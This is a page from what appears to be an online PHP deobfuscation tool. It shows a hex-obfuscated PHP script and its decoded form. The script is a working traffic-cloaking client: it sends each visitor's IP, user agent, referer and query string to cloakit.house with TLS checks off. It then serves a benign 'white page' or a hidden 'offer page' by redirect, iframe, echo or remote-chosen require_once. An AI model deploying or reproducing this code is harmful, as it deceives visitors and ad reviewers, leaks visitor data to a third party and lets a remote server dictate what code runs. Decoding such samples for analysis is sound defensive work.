Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

goto NaXwy; w8ENm: $ip_address = $_SERVER["\x52\105\115\117\x54\105\137\101\x44\104\122"]..

Decoded Output download

<?   goto NaXwy; w8ENm: $ip_address = $_SERVER["REMOTE_ADDR"]; goto lO0Pj; NaXwy: error_reporting(0); goto CCAcn; RsTwy: if (function_exists("curl_version")) { $request_data = http_build_query($request_data); $ch = curl_init("https://cloakit.house/api/v1/check"); curl_setopt_array($ch, array(CURLOPT_RETURNTRANSFER => TRUE, CURLOPT_CUSTOMREQUEST => "POST", CURLOPT_SSL_VERIFYPEER => FALSE, CURLOPT_TIMEOUT => 15, CURLOPT_POSTFIELDS => $request_data)); $result = curl_exec($ch); $info = curl_getinfo($ch); curl_close($ch); if (!empty($info) && $info["http_code"] == 200) { $body = json_decode($result, TRUE); if (!empty($body["filter_type"]) && $body["filter_type"] == "subscription_expired") { die("Your Subscription Expired."); } if (!empty($body["url_white_page"]) && !empty($body["url_offer_page"])) { $ontext_options = array("ssl" => array("verify_peer" => FALSE, "verify_peer_name" => FALSE), "http" => array("header" => "User-Agent: " . $_SERVER["HTTP_USER_AGENT"])); if ($body["filter_page"] == "offer") { if ($body["mode_offer_page"] == "loading") { if (filter_var($body["url_offer_page"], FILTER_VALIDATE_URL)) { echo str_replace("<head>", "<head><base href="" . $body["url_offer_page"] . "" />", file_get_contents($body["url_offer_page"], FALSE, stream_context_create($ontext_options))); } elseif (file_exists($body["url_offer_page"])) { if (pathinfo($body["url_offer_page"], PATHINFO_EXTENSION) == "html") { echo file_get_contents($body["url_offer_page"], FALSE, stream_context_create($ontext_options)); } else { require_once $body["url_offer_page"]; } } else { die("Offer Page Not Found."); } } if ($body["mode_offer_page"] == "redirect") { header("Location: " . $body["url_offer_page"], TRUE, 302); die(0); } if ($body["mode_offer_page"] == "iframe") { echo "<iframe src="" . $body["url_offer_page"] . "" width="100%" height="100%" align="left"></iframe> <style> body { padding: 0; margin: 0; } iframe { margin: 0; padding: 0; border: 0; } </style>"; } } if ($body["filter_page"] == "white") { if ($body["mode_white_page"] == "loading") { if (filter_var($body["url_white_page"], FILTER_VALIDATE_URL)) { echo str_replace("<head>", "<head><base href="" . $body["url_white_page"] . "" />", file_get_contents($body["url_white_page"], FALSE, stream_context_create($ontext_options))); } elseif (file_exists($body["url_white_page"])) { if (pathinfo($body["url_white_page"], PATHINFO_EXTENSION) == "html") { echo file_get_contents($body["url_white_page"], FALSE, stream_context_create($ontext_options)); } else { require_once $body["url_white_page"]; } } else { die("White Page Not Found."); } } if ($body["mode_white_page"] == "redirect") { header("Location: " . $body["url_white_page"], TRUE, 302); die(0); } } } } else { die("Try again later."); } } else { die("cURL is not supported on the hosting."); } goto YMCQn; lO0Pj: $ip_headers = array("HTTP_CLIENT_IP", "HTTP_X_FORWARDED_FOR", "HTTP_CF_CONNECTING_IP", "HTTP_FORWARDED_FOR", "HTTP_X_COMING_FROM", "HTTP_COMING_FROM", "HTTP_FORWARDED_FOR_IP", "HTTP_X_REAL_IP"); goto F_bO1; x30_L: $request_data = array("label" => "fb7ae41b7fabdd9c79ea92244d0e5af6", "user_agent" => $_SERVER["HTTP_USER_AGENT"], "referer" => !empty($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : '', "query" => !empty($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : '', "lang" => !empty($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : '', "ip_address" => $ip_address); goto RsTwy; CCAcn: mb_internal_encoding("UTF-8"); goto w8ENm; F_bO1: if (!empty($ip_headers)) { foreach ($ip_headers as $header) { if (!empty($_SERVER[$header])) { $ip_address = trim($_SERVER[$header]); break; } } } goto x30_L; YMCQn: ?>

Did this file decode correctly?

Original Code

 goto NaXwy; w8ENm: $ip_address = $_SERVER["\x52\105\115\117\x54\105\137\101\x44\104\122"]; goto lO0Pj; NaXwy: error_reporting(0); goto CCAcn; RsTwy: if (function_exists("\x63\x75\x72\x6c\x5f\x76\x65\x72\x73\x69\157\156")) { $request_data = http_build_query($request_data); $ch = curl_init("\x68\x74\164\x70\x73\72\57\x2f\143\x6c\x6f\x61\153\151\164\56\150\157\x75\163\145\57\x61\x70\x69\x2f\166\x31\x2f\143\150\x65\x63\x6b"); curl_setopt_array($ch, array(CURLOPT_RETURNTRANSFER => TRUE, CURLOPT_CUSTOMREQUEST => "\x50\117\123\124", CURLOPT_SSL_VERIFYPEER => FALSE, CURLOPT_TIMEOUT => 15, CURLOPT_POSTFIELDS => $request_data)); $result = curl_exec($ch); $info = curl_getinfo($ch); curl_close($ch); if (!empty($info) && $info["\x68\x74\164\160\x5f\143\x6f\144\x65"] == 200) { $body = json_decode($result, TRUE); if (!empty($body["\146\x69\154\164\145\162\x5f\164\x79\x70\x65"]) && $body["\x66\151\154\164\145\162\137\164\x79\160\145"] == "\x73\x75\x62\x73\143\x72\151\160\164\x69\x6f\156\137\x65\170\x70\151\x72\x65\144") { die("\131\x6f\165\162\x20\x53\x75\142\163\x63\162\x69\x70\x74\x69\157\x6e\40\105\170\x70\x69\x72\145\144\x2e"); } if (!empty($body["\165\x72\154\x5f\x77\x68\x69\x74\x65\x5f\160\x61\x67\x65"]) && !empty($body["\x75\x72\x6c\137\x6f\146\x66\145\162\x5f\x70\141\x67\145"])) { $ontext_options = array("\x73\163\154" => array("\x76\x65\162\x69\146\171\137\x70\x65\x65\x72" => FALSE, "\x76\x65\x72\151\x66\x79\x5f\x70\x65\145\162\137\x6e\x61\155\x65" => FALSE), "\150\x74\x74\160" => array("\x68\x65\x61\x64\x65\162" => "\125\x73\145\x72\55\101\147\145\156\164\72\40" . $_SERVER["\110\x54\x54\120\x5f\125\x53\105\x52\137\101\x47\x45\x4e\x54"])); if ($body["\x66\151\x6c\164\x65\x72\137\160\x61\147\145"] == "\157\x66\146\x65\x72") { if ($body["\x6d\157\x64\x65\x5f\157\x66\146\145\162\137\x70\141\147\145"] == "\x6c\x6f\x61\144\151\156\147") { if (filter_var($body["\165\162\x6c\x5f\157\x66\x66\145\x72\x5f\160\x61\x67\x65"], FILTER_VALIDATE_URL)) { echo str_replace("\x3c\x68\x65\141\x64\x3e", "\x3c\150\x65\x61\144\x3e\74\142\141\163\145\40\x68\x72\x65\x66\x3d\x22" . $body["\165\x72\x6c\137\x6f\x66\146\x65\162\x5f\x70\141\x67\x65"] . "\x22\x20\57\76", file_get_contents($body["\x75\162\x6c\137\157\x66\146\x65\x72\x5f\160\141\147\145"], FALSE, stream_context_create($ontext_options))); } elseif (file_exists($body["\x75\x72\x6c\137\x6f\x66\146\145\162\137\x70\x61\147\x65"])) { if (pathinfo($body["\x75\162\x6c\x5f\x6f\x66\146\x65\x72\137\160\x61\x67\x65"], PATHINFO_EXTENSION) == "\150\164\x6d\154") { echo file_get_contents($body["\165\162\x6c\x5f\x6f\x66\x66\x65\x72\137\160\141\147\145"], FALSE, stream_context_create($ontext_options)); } else { require_once $body["\165\162\154\x5f\x6f\x66\146\145\162\137\x70\141\147\145"]; } } else { die("\117\146\146\x65\162\x20\120\x61\x67\145\x20\116\157\x74\40\106\157\165\x6e\x64\56"); } } if ($body["\x6d\x6f\144\x65\137\157\x66\146\x65\x72\x5f\x70\x61\x67\x65"] == "\x72\145\x64\x69\162\145\x63\164") { header("\114\157\x63\141\x74\151\157\156\72\40" . $body["\x75\x72\x6c\x5f\x6f\x66\146\x65\x72\x5f\160\141\x67\x65"], TRUE, 302); die(0); } if ($body["\x6d\157\x64\145\137\157\x66\146\145\x72\137\x70\x61\147\x65"] == "\151\x66\x72\x61\155\145") { echo "\x3c\151\146\x72\141\155\x65\x20\163\162\143\x3d\x22" . $body["\x75\162\x6c\x5f\157\x66\x66\x65\162\137\x70\x61\x67\145"] . "\42\40\167\151\144\164\150\x3d\42\61\60\60\x25\42\40\x68\x65\x69\x67\150\164\x3d\42\61\60\60\x25\42\x20\x61\154\151\x67\x6e\75\42\x6c\145\146\164\42\76\74\x2f\151\x66\162\141\x6d\145\x3e\40\x3c\x73\164\171\154\145\76\x20\142\157\x64\171\x20\x7b\40\160\x61\144\144\151\156\x67\x3a\x20\x30\x3b\40\x6d\141\162\147\151\x6e\x3a\40\60\73\40\175\x20\x69\x66\162\141\155\145\x20\x7b\x20\x6d\141\162\147\x69\156\x3a\x20\x30\73\40\160\x61\144\x64\151\x6e\147\x3a\40\x30\73\x20\142\x6f\x72\144\145\162\72\40\x30\x3b\x20\175\x20\x3c\57\163\164\x79\154\x65\76"; } } if ($body["\146\x69\x6c\x74\x65\162\x5f\x70\x61\x67\x65"] == "\167\x68\151\164\145") { if ($body["\x6d\157\144\x65\137\x77\x68\151\x74\x65\137\160\141\147\145"] == "\x6c\x6f\141\x64\151\x6e\x67") { if (filter_var($body["\x75\x72\154\x5f\x77\x68\x69\x74\145\137\x70\141\147\x65"], FILTER_VALIDATE_URL)) { echo str_replace("\74\x68\x65\141\144\x3e", "\x3c\x68\145\x61\x64\x3e\74\x62\141\x73\x65\40\150\162\x65\x66\75\x22" . $body["\x75\162\154\137\x77\x68\x69\164\x65\x5f\x70\x61\147\x65"] . "\42\40\x2f\76", file_get_contents($body["\165\162\x6c\137\x77\x68\151\164\145\x5f\x70\141\147\145"], FALSE, stream_context_create($ontext_options))); } elseif (file_exists($body["\165\162\x6c\x5f\167\x68\x69\x74\145\137\160\x61\147\145"])) { if (pathinfo($body["\165\162\154\137\167\150\151\164\145\137\160\x61\x67\145"], PATHINFO_EXTENSION) == "\150\164\155\154") { echo file_get_contents($body["\x75\162\x6c\x5f\167\150\151\x74\x65\x5f\x70\141\147\x65"], FALSE, stream_context_create($ontext_options)); } else { require_once $body["\165\162\x6c\x5f\167\x68\151\x74\x65\x5f\x70\141\147\145"]; } } else { die("\127\x68\x69\164\145\40\x50\x61\x67\x65\40\116\157\x74\x20\x46\157\x75\x6e\144\56"); } } if ($body["\x6d\157\144\145\x5f\x77\x68\x69\x74\145\x5f\160\x61\x67\x65"] == "\162\x65\x64\151\162\x65\x63\164") { header("\x4c\x6f\143\141\164\151\x6f\x6e\x3a\40" . $body["\x75\162\x6c\137\x77\150\x69\x74\x65\137\x70\141\x67\145"], TRUE, 302); die(0); } } } } else { die("\x54\162\x79\40\141\x67\141\x69\156\x20\154\141\164\x65\162\x2e"); } } else { die("\x63\125\122\114\x20\151\x73\x20\x6e\157\x74\40\x73\x75\x70\x70\157\x72\x74\x65\144\x20\157\156\x20\x74\150\145\40\x68\157\x73\164\151\156\147\x2e"); } goto YMCQn; lO0Pj: $ip_headers = array("\110\124\x54\x50\x5f\103\x4c\x49\x45\x4e\x54\137\111\x50", "\x48\124\x54\x50\x5f\130\x5f\106\x4f\x52\x57\101\122\104\x45\x44\x5f\106\117\122", "\110\x54\x54\120\137\x43\106\137\103\117\x4e\116\105\103\124\111\116\x47\137\x49\x50", "\110\x54\x54\120\x5f\106\117\122\x57\x41\122\104\105\x44\137\x46\117\x52", "\110\124\124\120\x5f\x58\137\x43\x4f\x4d\x49\x4e\107\137\x46\x52\117\115", "\110\124\124\x50\x5f\x43\117\115\x49\116\107\137\106\x52\117\x4d", "\110\x54\x54\x50\137\x46\x4f\122\x57\x41\x52\104\x45\x44\x5f\106\117\x52\x5f\111\120", "\110\x54\124\x50\x5f\x58\x5f\x52\105\x41\x4c\x5f\x49\x50"); goto F_bO1; x30_L: $request_data = array("\154\141\142\145\154" => "\146\142\x37\x61\x65\x34\x31\142\67\146\x61\142\144\x64\x39\x63\x37\x39\x65\141\x39\62\62\64\64\144\60\x65\65\141\146\x36", "\x75\163\145\x72\x5f\141\147\145\x6e\164" => $_SERVER["\110\124\x54\120\x5f\x55\123\105\x52\137\x41\x47\105\116\124"], "\x72\x65\x66\x65\162\145\162" => !empty($_SERVER["\110\124\124\120\137\x52\x45\x46\x45\x52\x45\122"]) ? $_SERVER["\x48\124\124\120\137\x52\x45\106\105\x52\105\x52"] : '', "\x71\165\x65\162\171" => !empty($_SERVER["\x51\x55\x45\x52\x59\137\123\124\122\x49\x4e\x47"]) ? $_SERVER["\121\x55\105\122\x59\x5f\123\124\122\x49\x4e\x47"] : '', "\154\141\156\147" => !empty($_SERVER["\110\124\x54\120\137\x41\103\103\105\x50\124\137\x4c\101\x4e\107\125\101\107\105"]) ? $_SERVER["\110\x54\124\120\x5f\x41\x43\x43\105\120\x54\137\x4c\x41\x4e\107\125\x41\107\x45"] : '', "\x69\160\137\141\144\144\162\145\163\x73" => $ip_address); goto RsTwy; CCAcn: mb_internal_encoding("\x55\x54\106\55\x38"); goto w8ENm; F_bO1: if (!empty($ip_headers)) { foreach ($ip_headers as $header) { if (!empty($_SERVER[$header])) { $ip_address = trim($_SERVER[$header]); break; } } } goto x30_L; YMCQn: ?>

Function Calls

None

Variables

None

Stats

MD5	5c86a469a1d718c1f3305b2f5e646b43
Eval Count	0
Decode Time	43 ms

Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

Decoded Output download

Did this file decode correctly?

How would you describe this file?

Original Code

Function Calls

Variables

Stats